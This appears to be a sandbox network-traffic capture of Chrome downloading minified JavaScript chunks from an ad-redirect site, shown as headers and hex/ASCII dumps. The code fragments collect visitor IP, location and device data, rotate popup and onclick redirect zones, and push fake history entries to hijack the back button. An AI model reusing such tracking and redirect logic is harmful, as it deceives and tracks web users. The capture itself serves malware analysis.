                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6c 61 62 52 65 64 69 72 65 63 74 6c 65 73 73 3a 69 7d 29 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 4f 66 66 65 72 50 61 6e 65 6c 2c 61 3d 65 2e 69 73 41 70 70 6c 61 62 52 65 64 69 72 65 63 74 6c 65 73 73 2c 73 3d 65 2e 69 73 44 65 76 65 6c 6f 70 6d 65 6e 74 2c 74 3d 65 2e 69 73 51 61 50 72 65 70 72 6f 64 2c 6e 3d 65 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2c 63 3d 61 3f 22 2f 61 70 69 2f 74 72 61 63 6b 2d 69 6d 70 72 65 73 73 69 6f 6e 2d 61 70 70 6c 61 62 22 3a 22 2f 61 70 69 2f 74 72 61 63 6b 22 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 44 2e 65 6e 76 2e 4e 45 58 54 5f 50 55 42 4c 49 43 5f 44 45 56 5f 4f 52 49 47 49 4e 2c 61 3d 44 2e 65 6e 76 2e 4e 45 58 54 5f 50 55 42 4c 49 43 5f 51 41 5f 4f 52 49 47 49
                                                                                                          Data Ascii: labRedirectless:i}),t=function(e){var r=e.isOfferPanel,a=e.isApplabRedirectless,s=e.isDevelopment,t=e.isQaPreprod,n=e.searchParams,c=a?"/api/track-impression-applab":"/api/track",i=function(){var e=D.env.NEXT_PUBLIC_DEV_ORIGIN,a=D.env.NEXT_PUBLIC_QA_ORIGI
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 2f 74 72 61 63 6b 3a 20 75 73 65 46 65 74 63 68 54 72 61 63 6b 3a 20 73 65 74 44 61 74 61 20 53 75 63 63 65 73 73 66 75 6c 20 52 65 73 70 6f 6e 73 65 20 46 72 6f 6d 20 52 65 67 75 6c 61 72 20 54 72 61 63 6b 20 22 2c 61 29 2c 4e 28 2b 66 2e 6e 2e 7a 29 29 2c 5b 33 2c 34 5d 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 74 3d 6e 2e 73 65 6e 74 28 29 2c 4d 28 7b 73 75 63 63 65 73 73 3a 21 31 2c 72 65 6a 65 63 74 5f 72 65 61 73 6f 6e 3a 28 30 2c 62 2e 5a 29 28 74 2c 45 72 72 6f 72 29 3f 74 2e 6d 65 73 73 61 67 65 3a 22 41 6e 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 22 2c 72 65 6a 65 63 74 5f 72 65 61 73 6f 6e 5f 63 6f 64 65 3a 22 66 65 74 63 68 20 66 61 69 6c 65 64 22 7d 29 2c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 2f 74 72 61
                                                                                                          Data Ascii: /track: useFetchTrack: setData Successful Response From Regular Track ",a),N(+f.n.z)),[3,4];case 3:return t=n.sent(),M({success:!1,reject_reason:(0,b.Z)(t,Error)?t.message:"An unknown error occurred",reject_reason_code:"fetch failed"}),console.error("/tra
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 76 61 72 20 65 3d 66 2e 6e 2e 7a 3b 72 65 74 75 72 6e 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 70 61 72 73 65 46 6c 6f 61 74 28 65 29 29 26 26 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 4e 75 6d 62 65 72 28 65 29 29 7d 28 29 3f 21 21 79 2e 73 68 6f 75 6c 64 43 6f 6c 6c 65 63 74 44 61 74 61 26 26 28 28 30 2c 6c 2e 79 4e 29 28 22 2f 74 72 61 63 6b 3a 20 4f 53 20 76 65 72 73 69 6f 6e 20 69 73 20 73 74 69 6c 6c 20 74 6f 20 62 65 20 69 64 65 6e 74 69 66 69 65 64 22 29 2c 21 30 29 3a 28 28 30 2c 6c 2e 79 4e 29 28 22 2f 74 72 61 63 6b 3a 20 49 6e 76 61 6c 69 64 20 7a 6f 6e 65 20 70 61 72 61 6d 65 74 65 72 22 29 2c 21 30 29 3a 28 28 30 2c 6c 2e 79 4e 29 28 22 2f 74 72 61 63 6b 3a 20 5a 6f 6e 65 20 70 61 72 61 6d 65 74 65 72 73 20 61 72 65 20 75 6e 64 65 66
                                                                                                          Data Ascii: var e=f.n.z;return!Number.isNaN(parseFloat(e))&&Number.isFinite(Number(e))}()?!!y.shouldCollectData&&((0,l.yN)("/track: OS version is still to be identified"),!0):((0,l.yN)("/track: Invalid zone parameter"),!0):((0,l.yN)("/track: Zone parameters are undef
                                                                                                          2025-01-06 11:09:22 UTC692INData Raw: 29 28 7b 7d 2c 62 2e 75 73 65 72 44 61 74 61 29 2c 7b 62 72 6f 77 73 65 72 3a 70 2e 62 72 6f 77 73 65 72 2c 67 65 6f 3a 70 2e 67 65 6f 2c 6f 73 3a 70 2e 6f 73 2c 6f 73 56 65 72 73 69 6f 6e 3a 70 2e 6f 73 5f 76 65 72 73 69 6f 6e 2c 69 70 3a 70 2e 69 70 2c 63 69 74 79 3a 70 2e 63 69 74 79 2c 73 75 62 49 64 3a 65 7d 29 3b 76 28 7b 74 79 70 65 3a 6b 2e 4b 2e 73 65 74 55 73 65 72 44 61 74 61 2c 70 61 79 6c 6f 61 64 3a 5f 7d 29 2c 28 30 2c 6c 2e 63 4d 29 28 22 2f 74 72 61 63 6b 3a 20 64 69 73 70 61 74 63 68 65 64 20 75 73 65 72 44 61 74 61 20 61 73 20 49 41 70 70 6c 61 62 54 72 61 63 6b 52 65 73 70 6f 6e 73 65 22 2c 5f 29 7d 65 6c 73 65 7b 76 61 72 20 68 2c 79 3d 49 2c 6d 3d 28 30 2c 6e 2e 5a 29 28 28 30 2c 74 2e 5a 29 28 7b 7d 2c 62 2e 75 73 65 72 44 61 74 61
                                                                                                          Data Ascii: )({},b.userData),{browser:p.browser,geo:p.geo,os:p.os,osVersion:p.os_version,ip:p.ip,city:p.city,subId:e});v({type:k.K.setUserData,payload:_}),(0,l.cM)("/track: dispatched userData as IApplabTrackResponse",_)}else{var h,y=I,m=(0,n.Z)((0,t.Z)({},b.userData
                                                                                                          2025-01-06 11:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          54192.168.2.450096104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC553OUTGET /_next/static/chunks/c2f96434bddabe6e-1736072686539.3a22e244b1dff92a.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1722"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41680d087d02-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC873INData Raw: 31 37 32 32 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 34 36 38 33 5d 2c 7b 36 34 36 38 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 6f 29 7b 6f 2e 72 28 6e 29 2c 6f 2e 64 28 6e 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 7d 29 3b 76 61 72 20 69 3d 6f 28 39 38 37 38 38 29 2c 74 3d 6f 28 32 32 39 37 30 29 2c 63 3d 6f 28 31 32 31 33 39 29 2c 72 3d 6f 28 31 33 39 32 33 29 2c 61 3d 6f 28 37 31 39 36 31 29 2c 73 3d 6f 28 31 39 34 39 35 29 2c 75 3d 6f 28 39 35 37 39 38 29 2c 6c 3d 6f 28 39 30 39 37 29 2c 66 3d 6f 28 34 33 36 30 31 29 2c 6d 3d
                                                                                                          Data Ascii: 1722"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[64683],{64683:function(e,n,o){o.r(n),o.d(n,{default:function(){return C}});var i=o(98788),t=o(22970),c=o(12139),r=o(13923),a=o(71961),s=o(19495),u=o(95798),l=o(9097),f=o(43601),m=
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 3d 21 31 2c 73 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 75 2c 6c 3d 69 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 72 3d 28 75 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 72 3d 21 30 29 7b 76 61 72 20 66 3d 75 2e 76 61 6c 75 65 2c 43 3d 28 30 2c 6d 2e 5a 29 28 66 2e 72 61 6e 67 65 2c 32 29 2c 68 3d 43 5b 30 5d 2c 6b 3d 43 5b 31 5d 3b 69 66 28 63 3e 3d 68 26 26 28 6e 75 6c 6c 3d 3d 3d 6b 7c 7c 63 3c 3d 6b 29 29 72 65 74 75 72 6e 20 66 2e 77 65 69 67 68 74 7d 7d 63 61 74 63 68 28 64 29 7b 61 3d 21 30 2c 73 3d 64 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 72 7c 7c 6e 75 6c 6c 3d 3d 6c 2e 72 65 74 75 72 6e 7c 7c 6c 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 61 29 74 68 72 6f 77 20 73 7d 7d 72 65
                                                                                                          Data Ascii: =!1,s=void 0;try{for(var u,l=i[Symbol.iterator]();!(r=(u=l.next()).done);r=!0){var f=u.value,C=(0,m.Z)(f.range,2),h=C[0],k=C[1];if(c>=h&&(null===k||c<=k))return f.weight}}catch(d){a=!0,s=d}finally{try{r||null==l.return||l.return()}finally{if(a)throw s}}re
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 71 75 65 43 6f 6f 6b 69 65 20 2d 20 43 6f 6f 6b 69 65 20 76 69 65 77 2d 63 6f 75 6e 74 20 76 61 6c 75 65 3a 22 2c 73 29 2c 68 3d 70 61 72 73 65 49 6e 74 28 73 2c 31 30 29 2c 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 68 29 29 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 68 61 6e 64 6c 65 4e 6f 6e 55 6e 69 71 75 65 43 6f 6f 6b 69 65 20 2d 20 43 6f 6f 6b 69 65 20 76 69 65 77 2d 63 6f 75 6e 74 20 76 61 6c 75 65 20 69 73 20 6e 6f 74 20 61 20 6e 75 6d 62 65 72 3a 22 2c 73 29 2c 5b 32 5d 3b 5f 28 68 29 7d 65 6c 73 65 20 6b 3d 28 30 2c 66 2e 4e 29 28 72 2e 42 2e 56 49 45 57 5f 43 4f 55 4e 54 29 2c 28 30 2c 61 2e 63 4d 29 28 22 68 61 6e 64 6c 65 4e 6f 6e 55 6e 69 71 75 65 43 6f 6f 6b 69 65 20 2d 20 55 73 69 6e 67 20 6c 6f 63 61 6c 20 76 69 65 77
                                                                                                          Data Ascii: queCookie - Cookie view-count value:",s),h=parseInt(s,10),Number.isNaN(h))return console.error("handleNonUniqueCookie - Cookie view-count value is not a number:",s),[2];_(h)}else k=(0,f.N)(r.B.VIEW_COUNT),(0,a.cM)("handleNonUniqueCookie - Using local view
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6e 74 65 6e 74 2d 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 7d 2c 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6d 29 7d 29 5d 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 28 43 3d 61 2e 73 65 6e 74 28 29 29 2e 6f 6b 3f 5b 33 2c 34 5d 3a 5b 34 2c 43 2e 74 65 78 74 28 29 5d 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 68 3d 61 2e 73 65 6e 74 28 29 2c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 20 2d 20 46 65 74 63 68 20 66 61 69 6c 65 64 20 77 69 74 68 20 73 74 61 74 75 73 3a 20 22 2e 63 6f 6e 63 61 74 28 43 2e 73 74 61 74 75 73 2c 22 2c 20 6d 65 73 73 61 67 65 3a 20 22 29 2e 63 6f 6e 63 61 74 28 68 29 29 2c 5b 32 2c 6e 75 6c 6c 5d 3b 63 61 73 65 20
                                                                                                          Data Ascii: ntent-Type":"application/json"},body:JSON.stringify(m)})];case 2:return(C=a.sent()).ok?[3,4]:[4,C.text()];case 3:return h=a.sent(),console.error("checkCrossDomainCookie - Fetch failed with status: ".concat(C.status,", message: ").concat(h)),[2,null];case
                                                                                                          2025-01-06 11:09:22 UTC950INData Raw: 6e 43 75 73 74 6f 6d 20 63 6f 6f 6b 69 65 20 6c 69 66 65 74 69 6d 65 20 6e 6f 74 20 73 65 74 22 29 2c 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 44 65 66 61 75 6c 74 20 63 6f 6f 6b 69 65 20 6c 69 66 65 74 69 6d 65 3a 20 22 2e 63 6f 6e 63 61 74 28 65 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 29 29 2c 28 30 2c 73 2e 64 38 29 28 65 2e 6e 61 6d 65 2c 65 2e 76 61 6c 75 65 2c 7b 6d 61 78 41 67 65 3a 65 2e 72 65 6d 61 69 6e 69 6e 67 54 74 6c 2c 70 61 74 68 3a 22 2f 22 7d 29 7d 65 6c 73 65 28 30 2c 6c 2e 63 4d 29 28 22 63 68 65 63 6b 43 72 6f 73 73 44 6f 6d 61 69 6e 43 6f 6f 6b 69 65 5c 6e 43 6f 6f 6b 69 65 20 22 2e 63 6f 6e 63 61 74 28 65 2e 6e 61 6d 65 2c 22 20 6e 6f 74 20 65 78 69 73 74 22 29 29 7d 29 29
                                                                                                          Data Ascii: nCustom cookie lifetime not set"),(0,l.cM)("checkCrossDomainCookie\nDefault cookie lifetime: ".concat(e.remainingTtl)),(0,s.d8)(e.name,e.value,{maxAge:e.remainingTtl,path:"/"})}else(0,l.cM)("checkCrossDomainCookie\nCookie ".concat(e.name," not exist"))}))
                                                                                                          2025-01-06 11:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          55192.168.2.450100104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC553OUTGET /_next/static/chunks/cce078a36fb49fc2-1736072686539.a4de873c342c784d.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-c68"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4167f9e6c466-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC874INData Raw: 63 36 38 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 30 30 38 36 5d 2c 7b 38 30 30 38 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 61 2c 65 29 7b 65 2e 72 28 61 29 3b 76 61 72 20 72 3d 65 28 39 38 37 38 38 29 2c 6e 3d 65 28 32 32 39 37 30 29 2c 6f 3d 65 28 35 36 37 35 33 29 2c 73 3d 65 28 31 32 31 33 39 29 2c 69 3d 65 28 31 38 33 39 34 29 2c 6c 3d 65 28 31 37 39 36 39 29 2c 63 3d 65 28 37 31 39 36 31 29 2c 75 3d 65 28 35 32 39 32 39 29 2c 64 3d 65 28 33 35 31 34 37 29 2c 70 3d 65 28 37 32 31 38 31 29 2c 66 3d 65 28 35 33 34 34 34 29 2c 68 3d 65 28 35 31 36 35 39 29 2c 6d 3d 65 28 31 39 34
                                                                                                          Data Ascii: c68"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[80086],{80086:function(t,a,e){e.r(a);var r=e(98788),n=e(22970),o=e(56753),s=e(12139),i=e(18394),l=e(17969),c=e(71961),u=e(52929),d=e(35147),p=e(72181),f=e(53444),h=e(51659),m=e(194
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 30 2c 68 2e 70 52 29 28 74 2e 7a 6f 6e 65 73 29 7d 29 29 2e 6a 6f 69 6e 28 22 3b 22 29 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 28 30 2c 72 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 65 2c 72 2c 6f 2c 73 2c 75 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 5f 5f 67 65 6e 65 72 61 74 6f 72 29 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 28 65 3d 6e 65 77 20 55 52 4c 28 6c 2e 42 47 26 26 67 2e 65 6e 76 2e 4e 45 58 54 5f 50 55 42 4c 49 43 5f 51 41 5f 4f 52 49 47 49 4e 3f 67 2e 65 6e 76 2e 4e 45 58 54 5f 50 55 42 4c 49 43 5f 51 41 5f 4f 52 49 47 49 4e 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e
                                                                                                          Data Ascii: nction(t){return(0,h.pR)(t.zones)})).join(";"),e=function(){var a=(0,r.Z)((function(){var a,e,r,o,s,u;return(0,n.__generator)(this,(function(n){switch(n.label){case 0:(e=new URL(l.BG&&g.env.NEXT_PUBLIC_QA_ORIGIN?g.env.NEXT_PUBLIC_QA_ORIGIN:window.location
                                                                                                          2025-01-06 11:09:22 UTC940INData Raw: 3d 20 22 2c 73 29 3b 76 61 72 20 69 3d 65 5b 61 5d 2c 6c 3d 72 5b 61 5d 2c 75 3d 6e 5b 61 5d 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 73 29 7b 76 61 72 20 64 3d 28 30 2c 68 2e 24 39 29 28 73 29 2c 66 3d 28 30 2c 70 2e 48 50 29 28 7b 75 72 6c 3a 73 2c 74 79 70 65 3a 64 3f 22 69 70 70 22 3a 22 6f 6e 63 6c 69 63 6b 22 2c 6f 61 69 64 3a 5f 2c 6f 73 56 65 72 73 69 6f 6e 3a 4e 2e 64 61 74 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2c 73 75 62 49 64 3a 6b 2c 70 61 73 73 50 61 72 61 6d 54 6f 50 61 72 61 6d 73 3a 49 7d 29 3b 6f 2e 70 75 73 68 28 7b 7a 6f 6e 65 4e 61 6d 65 3a 69 2c 75 72 6c 3a 66 2c 74 61 62 3a 6c 2c 77 65 69 67 68 74 3a 75 7d 29 7d 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 2f 72 6f 74 61 74 65 3a
                                                                                                          Data Ascii: = ",s);var i=e[a],l=r[a],u=n[a];if("string"===typeof s){var d=(0,h.$9)(s),f=(0,p.HP)({url:s,type:d?"ipp":"onclick",oaid:_,osVersion:N.data.platformVersion,subId:k,passParamToParams:I});o.push({zoneName:i,url:f,tab:l,weight:u})}else console.error("/rotate:
                                                                                                          2025-01-06 11:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          56192.168.2.450098104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC553OUTGET /_next/static/chunks/dbb80ba394719d25-1736072686539.0157f5525bb5ad80.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-3c86"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41680c257274-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC873INData Raw: 33 63 38 36 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 37 34 32 30 5d 2c 7b 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 31 33 39 29 2c 69 3d 74 28 36 31 36 35 36 29 2c 6f 3d 74 28 38 33 32 31 36 29 2c 61 3d 74 28 37 31 39 36 31 29 2c 73 3d 74 28 33 35 31 34 37 29 2c 75 3d 74 28 32 31 38 31 38 29 2c 63 3d 74 28 35 31 36 35 39 29 2c 6c 3d 74 28 39 34 33 39 37 29 2c 64 3d 74 28 31 39 34 39 35 29 2c 66 3d 5b 22 63 6f 61 6a 75 74 6f 61 2e 63
                                                                                                          Data Ascii: 3c86"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[47420],{50656:function(e,n,t){t.d(n,{N:function(){return v}});var r=t(12139),i=t(61656),o=t(83216),a=t(71961),s=t(35147),u=t(21818),c=t(51659),l=t(94397),d=t(19495),f=["coajutoa.c
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 7b 76 61 72 20 6c 2c 64 2c 76 2c 62 2c 77 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 68 2e 62 61 63 6b 2e 68 69 73 74 6f 72 79 54 69 6d 65 41 6d 6f 75 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 33 2c 79 3d 6e 75 6c 6c 3d 3d 3d 28 72 3d 68 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 3d 3d 3d 75 2e 77 2e 62 61 63 6b 7d 29 29 3b 69 66 28 79 29 76 3d 28 30 2c 63 2e 6b 36 29 28 75 2e 77 2e 62 61 63 6b 29 2c 64 3d 79 3b 65 6c 73 65 20 64 3d 6e 75 6c 6c 3d 3d 3d 28 62 3d 68 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f
                                                                                                          Data Ascii: {var l,d,v,b,w=null!==(l=h.back.historyTimeAmount)&&void 0!==l?l:3,y=null===(r=h.back.zones)||void 0===r?void 0:r.find((function(e){return e.type===u.w.back}));if(y)v=(0,c.k6)(u.w.back),d=y;else d=null===(b=h.back.zones)||void 0===b?void 0:b.find((functio
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 70 75 73 68 20 73 74 61 74 65 2c 20 65 72 72 6f 72 3a 22 2c 69 29 7d 7d 28 22 2f 62 61 63 6b 3f 22 2e 63 6f 6e 63 61 74 28 53 29 2c 77 2c 74 29 7d 65 6c 73 65 28 30 2c 61 2e 79 4e 29 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 22 29 29 3b 65 6c 73 65 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 6e 6f 74 20 66 6f 75 6e 64 22 29 29 7d 7d 7d 7d 7d 2c 34 37 34 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 72 28 6e 29 2c 74 2e 64 28 6e 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 7d 7d 29 3b 76 61 72 20 72 2c 69 3d 74 28 34 37 38 34 32 29 2c 6f 3d 74 28 36 36 33 38 33 29 2c 61 3d 74 28 35
                                                                                                          Data Ascii: push state, error:",i)}}("/back?".concat(S),w,t)}else(0,a.yN)("Zone ".concat(e," is not enabled"));else console.error("Zone ".concat(e," not found"))}}}}},47420:function(e,n,t){t.r(n),t.d(n,{default:function(){return B}});var r,i=t(47842),o=t(66383),a=t(5
